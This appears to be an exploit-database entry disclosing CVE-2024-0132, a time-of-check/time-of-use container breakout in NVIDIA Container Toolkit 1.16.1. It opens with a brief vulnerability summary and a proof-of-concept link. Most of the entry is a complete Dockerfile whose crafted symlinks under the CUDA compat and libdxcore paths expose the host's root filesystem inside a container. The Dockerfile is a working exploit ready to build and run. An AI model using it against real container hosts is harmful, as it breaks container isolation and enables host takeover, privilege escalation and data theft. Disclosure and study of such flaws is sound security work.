# Exploit Title: Container Breakout with NVIDIA Container Toolkit # Date: 17/02/2025 # Exploit Author: r0binak #Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit # Version: 1.16.1 # Tested on: NVIDIA Container Tooklit 1.16.1 # CVE: CVE-2024-0132 Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a Time-of-check Time-of-Use (TOCTOU) vulnerability when used with default configuration where a specifically crafted container image may gain access to the host file system. This does not impact use cases where CDI is used. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering. PoC link: https://github.com/r0binak/CVE-2024-0132 Steps to Reproduce: Build and run a docker image based on such a Dockerfile: FROM ubuntu RUN mkdir -p /usr/local/cuda/compat/ RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/ RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs RUN mkdir -p /pwn/libdxcore.so.1337/ RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1 RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2 The host file system will reside in /usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/ Regards, Sergey `*r0binak*` Kanibor